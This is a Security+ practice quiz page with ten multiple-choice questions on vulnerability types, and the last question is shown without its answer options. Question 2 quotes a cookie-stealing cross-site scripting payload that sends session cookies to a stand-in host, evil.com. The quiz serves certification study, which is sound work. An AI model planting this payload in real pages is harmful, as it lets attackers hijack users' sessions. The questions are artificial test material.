CompTIA Security+ Practice Test of the Day 071525

Welcome to today’s CompTIA Security+ practice test!

This practice test uses our new UI!

Today’s practice test is based on Subdomain 2.3 (Explain various types of vulnerabilities) from the CompTIA Security+ SY0-701 objectives.

This beginner-level practice test is inspired by the CompTIA Security+ (SY0-701) exam and is designed to help you reinforce key cybersecurity concepts on a daily basis.

These questions are not official exam questions, nor are they brain dumps, but they reflect topics and scenarios relevant to the Security+ certification. Use them to test your knowledge, identify areas for improvement, and build daily cybersecurity habits.

Note: CompTIA and Security+ are registered trademarks of CompTIA. This content is not affiliated with or endorsed by CompTIA.

To choose CompTIA Security+ practice tests based on specific domains/subdomains, click that link.

CompTIA Security+ Practice Test of the Day 071525

10 questions • Single best answer

Question 1

A web application displays customer order details by appending an order ID to the URL. A penetration tester enters a single quote after the order ID and receives a detailed database error message. Which vulnerability is MOST likely present?

A. Cross-site scripting (XSS) B. Buffer overflow C. SQL injection D. Directory traversal

Question 2

An attacker injects the string 'document.location='https://evil.com/?c='+document.cookie' into a product review field on an e-commerce site. Other users who view the product page have their session cookies sent to the attacker's server. Which vulnerability is being exploited?

A. SQL injection B. Cross-site scripting (XSS) C. Buffer overflow D. Race condition

Question 3

A security researcher discovers that a C++ application does not validate the length of user-supplied input before writing it to a fixed-size stack buffer. Providing input longer than the buffer size causes the application to crash and potentially allows arbitrary code execution. Which vulnerability is described?

A. SQL injection B. Race condition C. Memory injection D. Buffer overflow

Question 4

A banking application checks a user's account balance before approving a withdrawal, but a brief window exists between the balance check and the deduction. An attacker exploits this gap by initiating multiple simultaneous withdrawals, overdrawing the account. Which vulnerability type is described?

A. Buffer overflow B. Race condition C. SQL injection D. Privilege escalation

Question 5

A security researcher demonstrates that a vulnerability in a hypervisor allows a malicious virtual machine to access memory regions belonging to other VMs on the same host. Which virtualization vulnerability is described?

A. Resource reuse B. VM escape C. Misconfiguration D. Side-channel attack

Question 6

A threat actor exploits a vulnerability in a popular application that was discovered and publicly disclosed the previous day. The vendor has not yet released a patch and no mitigation exists. Which vulnerability type does this represent?

A. Misconfiguration B. Supply chain C. Zero-day D. Legacy application

Question 7

A cloud security audit reveals that an S3 bucket containing sensitive customer data has been configured with public read access, allowing anyone on the internet to download its contents. Which vulnerability type does this represent?

A. Zero-day B. Supply chain C. Cryptographic D. Misconfiguration

Question 8

A penetration tester injects shellcode into a running process's memory by exploiting an API call that allows writing to arbitrary memory addresses. The injected code executes with the same privileges as the target process. Which vulnerability type is described?

A. Buffer overflow B. Memory injection C. Race condition D. Privilege escalation

Question 9

A user jailbreaks their iPhone to install apps from outside the official App Store. A security administrator notes this creates significant risk for the organization. Which mobile device vulnerability does jailbreaking introduce?

A. Side loading B. Firmware vulnerability C. Resource reuse D. Jailbreaking

Question 10

A security team discovers that a router's manufacturer released a firmware update containing malicious code after their build system was compromised. Devices that applied the update are now silently beaconing to an attacker-controlled server. Which vulnerability category BEST describes the root cause?